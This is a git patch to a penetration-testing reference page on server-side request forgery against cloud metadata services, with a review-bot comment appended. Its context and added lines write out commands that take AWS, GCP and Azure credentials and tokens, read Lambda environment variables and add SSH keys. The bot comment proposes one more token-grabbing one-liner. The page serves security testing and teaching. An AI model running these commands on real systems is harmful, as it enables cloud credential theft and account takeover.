From 21283c564411cf54e6258d891a639f181c9ca915 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Fri, 10 Jan 2025 10:08:03 +0100 Subject: [PATCH] aa ssrf --- .../cloud-ssrf.md | 71 ++++++------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 7cdb561ae..68951fe99 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | > [!NOTE] > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. -### SSRF for AWS Lambda +### SSRF for AWS Lambda In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. @@ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat > [!WARNING] > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. -### SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. 
@@ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -## GCP +## GCP You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). -### SSRF URL for Google Cloud +### SSRF URL for Google Cloud Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: @@ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true > gcloud config unset auth/access_token_file > ``` -### Add an SSH key +### Add an SSH key Extract the token @@ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' ``` -### Cloud Functions +### Cloud Functions The metadata endpoint works the same as in VMs but without some endpoints: @@ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta done ``` -## Digital Ocean +## Digital Ocean > [!WARNING] > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials @@ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -## Azure +## Azure ### Azure VM @@ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h {{#endtab}} {{#endtabs}} -### Azure App & Functions Services +### Azure App & Functions Services & Automation Accounts From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. 
@@ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/" Write-Host "Storage Token: $storageToken" +# Using oneliners +## Get management token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get graph token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get vault token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get storage token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token - -# API request in powershell to management endpoint -$Token = 'eyJ0eX..' -$URI='https://management.azure.com/subscriptions?api-version=2020-01-01' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# API request to graph endpoint (get enterprise applications) -$Token = 'eyJ0eX..' -$URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# Using AzureAD Powershell module witho both management and graph tokens -$token = 'eyJ0e..' -$graphaccesstoken = 'eyJ0eX..' 
-Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc - -# Try to get current perms over resources -Get-AzResource -## The following error means that the user doesn't have permissions over any resource -Get-AzResource : 'this.Client.SubscriptionId' cannot be null. -At line:1 char:1 -+ Get-AzResource -+ ~~~~~~~~~~~~~~ - + CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException - + FullyQualifiedErrorId : -Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet +## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with: +Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID' ``` {{#endtab}} {{#endtabs}} -## IBM Cloud +## IBM Cloud > [!WARNING] > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
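Review bot: The four added Invoke-RestMethod one-liners send no `client_id`, so they only ever return a token for the system-assigned identity, yet the trailing comment says an Automation Account may expose a user-assigned identity's client ID in `AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID` without showing how that value is used. The App Service/Automation identity endpoint selects a user-assigned identity through a query parameter, so the example should close the loop: `$clientId = Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID'` followed by `(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01&client_id=$clientId" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token` (confirm the parameter name against the endpoint version in use). The explanatory comment also carries a typo ("gatehred") and awkward grammar; suggest `## In Automation Accounts the client ID of the assigned user-managed identity may be stored in an Automation variable, retrievable with:`. With the Connect-AzAccount/Get-AzResource block removed, this tab no longer shows what to do with a token once obtained, so a one-line pointer to the management/Graph API call examples elsewhere on the page would keep the section self-contained.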